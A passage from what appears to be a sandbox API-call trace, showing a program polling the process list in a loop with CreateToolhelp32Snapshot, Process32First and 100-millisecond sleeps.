dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0249.188] Sleep (dwMilliseconds=0x64) [0249.246] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0249.270] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0249.423] Sleep (dwMilliseconds=0x64) [0249.437] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0249.453] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0249.588] Sleep (dwMilliseconds=0x64) [0249.688] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0249.705] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0249.878] Sleep (dwMilliseconds=0x64) [0249.941] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0249.955] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0250.194] Sleep (dwMilliseconds=0x64) [0250.199] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0250.213] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0250.289] Sleep (dwMilliseconds=0x64) [0250.347] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x758 [0250.368] Process32First (in: hSnapshot=0x758, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0250.552] Sleep (dwMilliseconds=0x64) [0250.606] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0250.756] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0250.829] Sleep (dwMilliseconds=0x64) [0250.891] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x758 [0250.911] Process32First (in: hSnapshot=0x758, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0250.984] Sleep (dwMilliseconds=0x64) [0251.034] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x758 [0251.094] Process32First (in: hSnapshot=0x758, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0251.277] Sleep (dwMilliseconds=0x64) [0251.324] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x758 [0251.345] Process32First (in: hSnapshot=0x758, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0251.446] Sleep (dwMilliseconds=0x64) [0251.476] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0251.502] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0251.594] Sleep (dwMilliseconds=0x64) [0251.674] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x758 [0251.691] Process32First (in: hSnapshot=0x758, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0251.900] Sleep (dwMilliseconds=0x64) [0251.954] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x758 [0252.019] Process32First (in: hSnapshot=0x758, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0252.173] Sleep (dwMilliseconds=0x64) [0252.219] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x758 [0252.238] Process32First (in: hSnapshot=0x758, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0252.344] Sleep (dwMilliseconds=0x64) [0252.361] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x758 [0252.377] Process32First (in: hSnapshot=0x758, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0252.575] Sleep (dwMilliseconds=0x64) [0252.626] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x758 [0252.638] Process32First (in: hSnapshot=0x758, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0252.834] Sleep (dwMilliseconds=0x64) [0252.868] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0252.877] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0253.018] Sleep (dwMilliseconds=0x64) [0253.114] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x758 [0253.127] Process32First (in: hSnapshot=0x758, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0253.518] Sleep (dwMilliseconds=0x64) [0253.747] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x758 [0253.759] Process32First (in: hSnapshot=0x758, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0253.926] Sleep (dwMilliseconds=0x64) [0253.946] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0253.957] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0254.015] Sleep (dwMilliseconds=0x64) [0254.030] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0254.040] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0254.161] Sleep (dwMilliseconds=0x64) [0254.218] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0254.237] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0254.403] Sleep (dwMilliseconds=0x64) [0254.456] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0254.474] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0254.582] Sleep (dwMilliseconds=0x64) [0254.591] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0254.601] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0254.837] Sleep (dwMilliseconds=0x64) [0254.890] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0254.900] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0255.092] Sleep (dwMilliseconds=0x64) [0255.120] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0255.131] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0255.245] Sleep (dwMilliseconds=0x64) [0255.297] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x758 [0255.310] Process32First (in: hSnapshot=0x758, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0255.416] Sleep (dwMilliseconds=0x64) [0255.470] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x758 [0255.480] Process32First (in: hSnapshot=0x758, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0255.613] Sleep (dwMilliseconds=0x64) [0255.626] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x758 [0255.636] Process32First (in: hSnapshot=0x758, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0255.799] Sleep (dwMilliseconds=0x64) [0255.847] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x758 [0255.863] Process32First (in: hSnapshot=0x758, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0256.298] Sleep (dwMilliseconds=0x64) [0256.377] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x758 [0256.460] Process32First (in: hSnapshot=0x758, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0256.856] Sleep (dwMilliseconds=0x64) [0257.031] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0257.153] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0257.312] Sleep (dwMilliseconds=0x64) [0257.395] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0257.462] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0257.848] Sleep (dwMilliseconds=0x64) [0257.895] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0257.955] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0258.025] Sleep (dwMilliseconds=0x64) [0258.037] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x758 [0258.054] Process32First (in: hSnapshot=0x758, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0258.151] Sleep (dwMilliseconds=0x64) [0258.205] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0258.221] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0258.391] Sleep (dwMilliseconds=0x64) [0258.434] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0258.462] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0258.538] Sleep (dwMilliseconds=0x64) [0258.580] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0258.593] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0258.661] Sleep (dwMilliseconds=0x64) [0258.704] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x758 [0258.743] Process32First (in: hSnapshot=0x758, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0258.854] Sleep (dwMilliseconds=0x64) [0258.906] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0258.928] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0259.415] Sleep (dwMilliseconds=0x64) [0259.423] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0259.444] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0259.627] Sleep (dwMilliseconds=0x64) [0259.673] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x758 [0259.682] Process32First (in: hSnapshot=0x758, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0259.891] Sleep (dwMilliseconds=0x64) [0259.949] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x758 [0259.961] Process32First (in: hSnapshot=0x758, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0260.099] Sleep (dwMilliseconds=0x64) [0260.115] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0260.131] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0260.291] Sleep (dwMilliseconds=0x64) [0260.340] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0260.354] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0260.486] Sleep (dwMilliseconds=0x64) [0260.531] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0260.585] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0260.649] Sleep (dwMilliseconds=0x64) [0260.709] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0260.722] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0260.956] Sleep (dwMilliseconds=0x64) [0260.999] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0261.064] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0261.187] Sleep (dwMilliseconds=0x64) [0261.250] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x758 [0261.271] Process32First (in: hSnapshot=0x758, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0261.352] Sleep (dwMilliseconds=0x64) [0261.356] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x758 [0261.366] Process32First (in: hSnapshot=0x758, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0261.470] Sleep (dwMilliseconds=0x64) [0261.516] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x758 [0261.527] Process32First (in: hSnapshot=0x758, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0261.630] Sleep (dwMilliseconds=0x64) [0261.691] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x758 [0261.707] Process32First (in: hSnapshot=0x758, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0261.938] Sleep (dwMilliseconds=0x64) [0261.983] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0261.992] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0262.099] Sleep (dwMilliseconds=0x64) [0262.148] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0262.159] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0262.262] Sleep (dwMilliseconds=0x64) [0262.300] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x758 [0262.316] Process32First (in: hSnapshot=0x758, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0262.380] Sleep (dwMilliseconds=0x64) [0262.389] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x758 [0262.401] Process32First (in: hSnapshot=0x758, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0262.551] Sleep (dwMilliseconds=0x64) [0262.604] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x758 [0262.622] Process32First (in: hSnapshot=0x758, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0262.865] Sleep (dwMilliseconds=0x64) [0262.902] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x758 [0262.913] Process32First (in: hSnapshot=0x758, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0263.027] Sleep (dwMilliseconds=0x64) [0263.128] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x758 [0263.169] Process32First (in: hSnapshot=0x758, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0263.348] Sleep (dwMilliseconds=0x64) [0263.408] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x758 [0263.427] Process32First (in: hSnapshot=0x758, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0263.543] Sleep (dwMilliseconds=0x64) [0263.561] 